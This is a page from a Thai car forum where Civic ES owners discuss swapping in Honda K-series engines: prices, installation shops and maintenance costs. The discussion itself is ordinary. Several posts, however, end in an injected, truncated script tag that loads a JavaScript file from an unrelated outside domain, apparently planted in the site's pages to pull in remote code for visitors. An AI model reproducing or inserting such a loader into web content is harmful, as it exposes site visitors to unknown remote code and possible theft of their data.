พุธ, 18 มกรา 2012 15:54 - ความเป็นไปได้เรื่อง K SERIES
yoosabai พิมพ์ว่า:
ผมเองก็อยากได้ แต่บวกลบคูณหารแล้ว เห็นทีจะต้องขับบล็อค D ต่อไปก่อน เอาให้มันพังคาเท้า

เหตุผลที่เครื่อง K มีราคาสูงในมุมมองผม น่าจะเป็นเพราะมันผลิต และใช้กับรถที่ผลิตและขายในญี่ปุ่นกับประเทศอื่นอีกบางประเทศเท่านั้น ซึ่งยกเว้นประเทศไทย.... ขนาดในญี่ปุ่นเองก็มีรถเพียงไม่กี่รุ่นที่ใช้เครื่อง K เป็นเครื่องติดรถจากโรงงาน แถมมันยังไม่ใช่รถตลาดซะด้วย
ก็เลยเข้าทางที่ว่าของมีน้อยคนอยากได้เยอะ คนกลางที่เอาเข้ามาก็เลยเพิ่มราคาขายขึ้นได้อีกเยอะ

อีกอย่างนึงผมว่ามันยังเป็นเทคโนโลยีใหม่อยู่ด้วยอ่ะครับ

เรื่องราคาตามที่คุณ จขกท. บอก เป็นราคาที่ใครๆก็ปรารณารวมทั้งผมเอง.... แต่ดูจากตลาดแล้วคงเป็นไปได้ยากในช่วงเวลาอันใกล้นี้น่ะครับ ปล่อยให้เป็นไปตามวัฎจักรของมันดีกว่าครับ เดี๋ยวมันก็ลงของมันเอง

เรื่องอู่ อู่ไหนที่เคยทำ คนก็จะแห่เข้าไปทำกันแต่อู่นั้น.... ซึ่งถ้าเป็นผม ผมก็น่าจะทำอย่างนั้นเหมือนกัน ของมันแพงก็ไม่อยากไปลองผิดลองถูกกับอู่อื่น เดี๋ยวมันจะได้ไม่คุ้มเสีย

แต่ผมเชื่อว่าเดี๋ยวพอความต้องการมันมากขึ้นเรื่อยๆ คนก็จะเอามันเข้ามากันมากขึ้น สุดท้ายมันก็จะล้นตลาด ราคาก็น่าจะถูกลงครับ

แต่หากความนิยมยังมีอยู่อย่างต่อเนื่อง จนของที่มีอยู่ในตลาดค่อยๆน้อยลง มันก็น่าจะกลับมาแพงอีกเหมือนกับบรรดา B16 หรือ J อ่ะครับ




ลึก!ซึ้ง เหมือนเข้ามานั่งอยู่ในใจผมเลย แต่ผมก็อยากให้มันเป็นไปได้ในเวลาอันใกล้นะคร้าบบบบบบบบบบ ทีนี้แหละเสียทีก็จอดกันยาวหละคร้าบบบบบบบบ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: K_series 
MoDes


เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

ที่อยู่: สายไหม56/2 - ปทุมธานี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 18 มกรา 2012 15:58 - ความเป็นไปได้เรื่อง K SERIES
สำหรีบผม d17a แตนๆก็ทะลุ200 แล้ว พอใจที่ตรงนี้ครับ อีกอย่าง ราคาพลังงานก็เรื่มจะโหดร้ายแล้ว เอะอะก็ขยับๆ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  K_series 
HJJ 502


เข้าร่วม: 17 ตุลา 2008
ตอบ: 699

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1088
ให้คำขอบคุณ: 962

ที่อยู่: ธนบุรี-ปากท่อ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 16:01 - ความเป็นไปได้เรื่อง K SERIES
ใจมันรัก K-Series ไปแล้ว
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
apssdemo


ชื่อเล่น: บัก บอล

เข้าร่วม: 21 ตุลา 2010
ตอบ: 462

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 658
ให้คำขอบคุณ: 348

ที่อยู่: ระยอง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 16:21 - ความเป็นไปได้เรื่อง K SERIES
ผมขอผูกโบ ก็พอแล้วครับ........17+โบก็พอจัยละครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ohmz1541


ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ที่อยู่: เชียงราย-รามอินทรา
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 17:09 - ความเป็นไปได้เรื่อง K SERIES
ผมเคยหวังจนเลิกหวังแล้วครับ

แต่ตอนนี้ได้ใช้ K-series สมใจแล้วครับ.... แต่เปน K24a ฝาดำนะ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  honeybeex7 
wighwaytak


เข้าร่วม: 29 มกรา 2010
ตอบ: 676

Guru ES
Guru ES

ได้รับคำขอบคุณ: 904
ให้คำขอบคุณ: 878

ที่อยู่: ตาก-กำแพงเพชร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 18:04 - ความเป็นไปได้เรื่อง K SERIES
MoDes พิมพ์ว่า:
สำหรีบผม d17a แตนๆก็ทะลุ200 แล้ว พอใจที่ตรงนี้ครับ อีกอย่าง ราคาพลังงานก็เรื่มจะโหดร้ายแล้ว เอะอะก็ขยับๆ



200เลยหรอครับลูกพี่ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ekdanai


ชื่อเล่น: ช้าง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 2062

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1977
ให้คำขอบคุณ: 1004

ที่อยู่: อ.เมือง จ.พิษณุโลก
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พุธ, 18 มกรา 2012 18:25 - ความเป็นไปได้เรื่อง K SERIES
wighwaytak พิมพ์ว่า:
MoDes พิมพ์ว่า:
สำหรีบผม d17a แตนๆก็ทะลุ200 แล้ว พอใจที่ตรงนี้ครับ อีกอย่าง ราคาพลังงานก็เรื่มจะโหดร้ายแล้ว เอะอะก็ขยับๆ



200เลยหรอครับลูกพี่ <script src="https://sport32news.com/civicesgroup.js"></

จริงๆครับ ใหม่ d17z mt no vtec ตอนนี้หลวมแล้วครับตามการใช้งาน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Nut_Au_Together


ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 มกรา 2012 18:29 - ความเป็นไปได้เรื่อง K SERIES
รอพังเหมือนกันจะไปวาง K แต่ราคานั้นช่างปวดร้าว
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
K_series


เข้าร่วม: 01 ตุลา 2008
ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พฤหัส, 19 มกรา 2012 01:19 - ความเป็นไปได้เรื่อง K SERIES
eskung พิมพ์ว่า:

ตอนนี้ผมกำลังคิดอยู่ว่าเดี๋ยวผมจะเอาจำนวนลูกค้ามาเป็นเครื่องต่อรอง คือขอราคาพิเศษจากเพื่อนๆผมนั่นเอง เรื่องเครื่องผมมั่นใจว่าผมซื้อให้พี่น้องเราทุกคนได้ราคาถูกแน่ๆ แต่ที่กำลังคิดหนักจะเป็นเรื่องค่าวาง และค่าบำรุงรักษาต่อจากนั้นมากกว่าครับ



เยี่ยมเลยครับ

ส่วนค่าบำรุงรักษาผมว่าแพงกว่าESครับ เพราะค่าตัวของรถที่เจ้าK20ประจำการอยู่ราคามันสูงกว่าละมั้ง

ลองหาราคาอุปกรณ์ที่คาดว่าจะเสียเช๊คราคาดูก่อนก้อได้ครับ จะได้มั่นใจว่ารับไหวมั้ย

และที่ต้องคำนึงคือระบบอื่นๆเช่น ช่วงล่าง เบรค ฯลฯ ตอนนี้พอรับกับK20ได้แ้ล้วหรือยัง ไม่งั้นก้อต้องมาหาใส่กันอีก


แต่ถ้าบำรุงรักษาทั่วไปแล้วไม่ได้จะต่างกับเจ้าESเลยครับ

อย่างเปลี่ยนถ่ายนมค.ก้อใช้น้ำมันสังเคราะห์แท้ ซึ่งESส่วนมากตอนนี้ก้อใช้กันอยู่อะแหละ จะแพงกว่าตรงที่K20ใช้4ลิตรครึ่งเท่าั้นั้น

น้ำมันเกียร์ดูจะแพงกว่าเพื่อนแต่ก้อไม่ใช่ว่าจะเปลี่ยนกันบ่อยๆ



แต่ที่ผมว่าควรจะคำนึงถึงเป็นอันดับแรกควรจะเป็นค่าวางและวิธีการวางของแต่ละอู่ก่อนน่ะครับ

เมื่อตัดสินใจแล้วเข้าไปคุยกับแต่ละอู่ว่าวิธีวางแบบไหน ใช้แท่นสำเร็จหรือจะเลาะDc5มาใส่ทั้งดุ้นก้อว่ากันไป

จบคร่าวๆที่ราคาเท่าไหร่ แล้วเลือกที่ชอบที่สุด



สุดท้ายหากชอบแนวนี้ K20A ไม่ทำให้ผิดหวังครับ วางไปแล้วเหมือนได้รถคันใหม่เลยหล่ะครับ
ได้รับคำขอบคุณจาก: newcolor  kittidech  ค้าอะไหล่โคตรเก่า  yoosabai  scanclub  honeybeex7  es330  mayuct  OiShIz  LnwwasaD 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.